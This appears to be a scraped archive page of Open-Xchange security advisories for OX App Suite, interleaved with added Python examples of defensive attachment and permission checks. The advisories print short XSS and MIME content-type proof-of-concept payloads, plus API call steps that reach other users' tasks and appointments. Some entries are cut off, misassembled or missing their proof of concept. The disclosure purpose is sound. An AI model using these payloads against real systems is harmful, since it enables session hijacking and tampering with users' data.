Researcher Credits: stemcloud
CVE reference: CVE-2018-13103
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Data with references to external content, like images of a contact imported as 
vcard, can be used to

[FD] Open-Xchange Security Advisory 2018-07-02

2018-07-02 Thread Open-Xchange GmbH
 This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create an HTML mail with malicious content at hyperlinks and use HTML 
encoding to cloak it
2. Make an App Suite user open the malicious link

Proof of concept:
For HTML: http://qwe-alert(document.domain)-">click
For Contacts (vCard): URL:qwe"-alert(document.domain)-"

Solution:
We added encoding and sanitization when handling encoded hyperlinks on the 
frontend.

---

Internal reference: 57095 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev37, 7.8.2-rev40, 7.8.3-rev48, 7.8.4-rev28
Vendor notification: 2018-02-12
Solution date: 2018-04-24
Public disclosure: 2018-07-02
Researcher Credits: Secator
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Curly brackets can be used to bypass XSS sanitization in HTML mail and other 
HTML attachments.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create an HTML mail with curly brackets that disguise event handlers in CSS
2. Make an App Suite user open the malicious mail

Proof of concept:


Solution:
We identify and drop potentially harmful content within CSS.

---

Internal reference: 57016 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev37, 7.8.2-rev40, 7.8.3-rev48, 7.8.4-rev28
Vendor notification: 2018-02-06
Solution date: 2018-04-24
Public disclosure: 2018-07-02
Researcher Credits: Secator
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Some browsers produce security issues when dealing with unknown content-types 
while handling downloads and by that circumvent our server-side efforts to 
safeguard users. In this case, Mozilla Firefox can be forced to guess a 
specific content type by providing unicode content-type and defining a specific 
file-name. The browser will examine the "name" attribute and eventually run 
malicious code within the current browser session.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create a malicious XML file and modify its content-type, set a specific 
"name"
2. Upload, embed and make someone open this file with Firefox

Proof of concept:
Content-Type: garbageЯ/garbage; name=html-xml-svg
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=html-xml-svg

Solution:
We now detect and deny handling of suspicious media-types.



Yours sincerely,
 Martin Heiland, Open-Xchange GmbH


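The following added example, not Open-Xchange code, shows in Python the server-side policy that the attachment-handling entries on this page describe: the stored media type and file name win over anything a client put into a request parameter or a crafted multipart part, a `content_disposition=inline` wish is honoured only for types that are safe to render, unparseable media types such as the `garbageЯ/garbage` above are refused outright, and the response tells the browser not to sniff. The inline allow-list and the sample names are assumptions.

```python
import re

# Assumed allow-list of media types a browser may render inline. Active content
# (HTML, XHTML, SVG, XML) is absent on purpose and is therefore always downloaded.
INLINE_SAFE_TYPES = {"image/png", "image/jpeg", "image/gif", "text/plain", "application/pdf"}

# RFC 2045 token characters only. A type that does not parse makes browsers fall
# back to content sniffing, which is the Firefox behaviour the advisory relies on.
_MEDIA_TYPE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+$")


def media_type_is_suspicious(content_type: str) -> bool:
    """True unless the type/subtype part is a clean ASCII token pair."""
    main = content_type.split(";", 1)[0].strip()
    return not _MEDIA_TYPE.match(main)


def safe_filename(name: str) -> str:
    """Drop path components and every character outside [A-Za-z0-9_.-]."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = re.sub(r"[^A-Za-z0-9_.\-]", "_", base).lstrip(".")
    return cleaned or "download"


def download_headers(stored_type: str, stored_name: str,
                     requested_disposition: str = "attachment") -> dict:
    """Response headers for serving a stored attachment.

    stored_type / stored_name come from the server's own record of the object.
    Values a client may have placed in a request parameter or in the multipart
    headers of a crafted mail are deliberately not inputs here, so modifying
    them changes nothing. requested_disposition is the client's wish (the
    content_disposition=inline parameter) and is honoured only for allow-listed
    types.
    """
    if media_type_is_suspicious(stored_type):
        raise ValueError("refusing to serve an unparseable media type")
    base_type = stored_type.split(";", 1)[0].strip().lower()
    inline = requested_disposition == "inline" and base_type in INLINE_SAFE_TYPES
    disposition = "inline" if inline else "attachment"
    return {
        "Content-Type": stored_type,
        "Content-Disposition": '%s; filename="%s"' % (disposition, safe_filename(stored_name)),
        # The declared type is final; the browser must not second-guess it.
        "X-Content-Type-Options": "nosniff",
    }
```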

[FD] Open-Xchange Security Advisory 2018-06-08

2018-06-08 Thread Open-Xchange GmbH
Dear subscribers,

we've migrated our public disclosure workflow to full-disclosure and are 
catching up on publishing recent vulnerabilities through this channel. Feel 
free to join our bug bounty programs (open-xchange, dovecot, powerdns) at 
HackerOne.

Yours sincerely,
 Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH


Internal reference: 55872 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev30, 7.8.2-rev30, 7.8.3-rev36, 7.8.4-rev18
Vendor notification: 2017-10-18
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5754
CVSS: n/a

Vulnerability Details:
Internet Explorer does not properly support modern Content Security Policies 
("CSP"), which act as a failsafe for certain XSS attacks. Since the "Open in 
Browser" feature is a potential attack vector to inject malicious content, we 
removed that option at the user interface. Instead, users shall download 
attachments and open them from their device. This removes the issue of 
executing script-code under the same domain.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. This is a precautionary change

Solution:
We no longer offer "Open in Browser" for IE based browsers. Microsoft Edge is 
not affected by this change.

---

Internal reference: 56333 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
Permission checks for tasks were incomplete with regards to folder-to-object 
association.

Risk:
Users within the same context could delete other users' tasks.

Steps to reproduce:
1. Create a task as User A (ID: 1)
2. As User B, trigger a /api/tasks?action=delete call with task ID 1 but a 
valid task folder ID of User B

Solution:
We enhanced permission checks for tasks for the "delete" call and check for 
folder-to-object association.

---

Internal reference: 56359 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-12-01
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
Permission checks for appointments were incomplete with regards to 
folder-to-object association.

Risk:
Users within the same context were able to add external participants to other 
users' appointments. Those users would potentially get notified about subsequent 
appointment changes and could therefore gather information beyond their 
permission level.

Steps to reproduce:
1. Create an appointment as User A (ID: 1)
2. As User B, trigger a /api/calendar?action=confirm call with appointment ID 1 
but a valid appointment folder ID of User B
3. Include an external participant in this "confirm" call

{"confirmmessage":"","confirmation":1, "type":5, "mail":"t...@example.com"}

Solution:
We enhanced permission checks for appointments for the "confirm" call and check 
for folder-to-object association.

---

Internal reference: 56334 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2018-5752
CVSS: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)

Vulnerability Details:
OX App Suite tries to look up external mail account configuration using XML 
files for auto-configuration, that are placed at most mail providers hosts. 
Redirects of external HTTP services could be used to access local or internal 
networks instead, when looking up that external account information.

Risk:
By validating error codes and request duration, attackers can get insight about 
internal network configuration, open ports and associated servi
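As an added example (not the App Suite implementation; all data constructed) of the folder-to-object association check named in the two "Improper Privilege Management" entries of this post, the following Python contrasts an authorization routine that only inspects the caller-supplied folder with one that first ties the object to that folder. It is written for a generic PIM object so it covers both the task "delete" and the appointment "confirm" case.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PimObject:
    """A task or appointment as stored: every object lives in exactly one folder."""
    id: int
    folder_id: int
    owner: str


# Constructed sample data. FOLDERS maps folder id -> users allowed to modify
# objects in it; OBJECTS maps object id -> stored object.
FOLDERS = {
    10: {"alice"},          # Alice's private folder
    20: {"bob"},            # Bob's private folder
    30: {"alice", "bob"},   # folder Alice shared with Bob
}
OBJECTS = {
    1: PimObject(id=1, folder_id=10, owner="alice"),
    2: PimObject(id=2, folder_id=30, owner="alice"),
}


def can_modify_folder(user: str, folder_id: int) -> bool:
    return user in FOLDERS.get(folder_id, set())


def authorize_vulnerable(user: str, object_id: int, folder_id: int) -> bool:
    """The bug class: rights are checked on the folder id the caller supplied,
    and the object id is then used as-is. Nothing ties the two together, so a
    caller who names any folder they own passes for any object id."""
    if object_id not in OBJECTS:
        return False
    return can_modify_folder(user, folder_id)


def authorize_fixed(user: str, object_id: int, folder_id: int) -> bool:
    """Folder-to-object association check: load the object, require that it
    really lives in the named folder, and only then check the caller's rights
    on that folder."""
    obj = OBJECTS.get(object_id)
    if obj is None or obj.folder_id != folder_id:
        return False
    return can_modify_folder(user, folder_id)
```

Returning the same `False` for "no such object" and "object not in that folder" keeps the response from confirming which object ids exist in other users' folders.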